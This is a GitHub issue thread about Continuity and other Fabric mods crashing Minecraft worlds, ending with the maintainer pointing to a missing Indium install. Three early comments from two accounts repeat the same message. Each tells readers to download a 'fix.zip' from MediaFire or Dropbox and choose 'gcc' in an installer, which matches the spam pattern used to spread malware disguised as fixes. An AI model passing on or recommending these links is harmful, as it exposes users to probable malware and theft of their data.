### ISSUE TITLE
Crashing when loading my world

### ISSUE THREAD

**Issue by Showanimes6times** [PepperCode1/Continuity#513]
HI,

I was wondering if anybody can fix the continuity, Fabric Renderer API (v1), More Culling, and Sodium (Not Enough Crashes). I saw those mods because of Not Enough Crashes. And I haven't been able to play any of my Minecraft worlds with those mods installed.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by meza** [comment]
Same here. Seems like a new Fabric Api update is causing issues

**Comment by Kuoxsr** [comment]
I was getting this crash too, but just now I updated everything in my pack (mostly adrenaline) - with the exception of Sodium (another mod crashes with the newest version of this, so I had to downgrade that back to what I originally had.)  Anyway, after updating (almost) everything to the latest, Continuity doesn't crash anymore.  Sorry, but I can't tell which update fixed the problem, because I did all of them at once, not really expecting to try Continuity again after the update, but I thought "what the heck... give it one last try," and it surprised me by working.  I assume that an old-ish fabric-api is the most likely culprit, but who knows?

Maybe someone who knows the code more intimately can explain which of my updates might have solved the issue.  I'm using "Adrenaline 1.21" from Modrinth, with a few extra mods thrown-in.  Sadly, I have no idea which versions of each that I was using during the crash, but the updates are all as of less than an hour ago, so maybe try that if you get this crash?

Mods added by Adrenaline:
- BadOptimizations
- cloth-config
- CullLessLeaves
- dynamic-fps
- enhancedblockentities
- entityculling-fabric
- fabric-api
- ferritecore
- ImmediatelyFast
- indium
- lithium-fabric
- modernfix-fabric
- noisium-fabric
- nvidium
- sodium-fabric
- threadtweak-fabric
- YetAnotherConfigLib
- yosbr

I added the following, apparently:
- antique-atlas
- appleskin-fabric
- BetterF3
- continuity
- entity_texture_features_fabric
- malilib-fabric
- modmenu
- I have no idea what added "placeholder-api"
- quickleafdecay
- surveyor
- tweakeroo

**Comment by PepperCode1** [comment]
Ensure Fabric API and Indium are updated to their latest versions.

**Comment by meza** [comment]
They are, still crashing

**Comment by meza** [comment]
Here's a log: https://mclo.gs/a8PiZz1

If I disable Continuity, there's no crash

**Comment by PepperCode1** [comment]
Open a new issue with your crash report, then. It is impossible for anyone to resolve a crash if the only information provided is "same here" or "still crashing".

**Comment by PepperCode1** [comment]
Sorry, I posted my last comment at the exact same time as you posted your crash log. You do not have Indium installed.
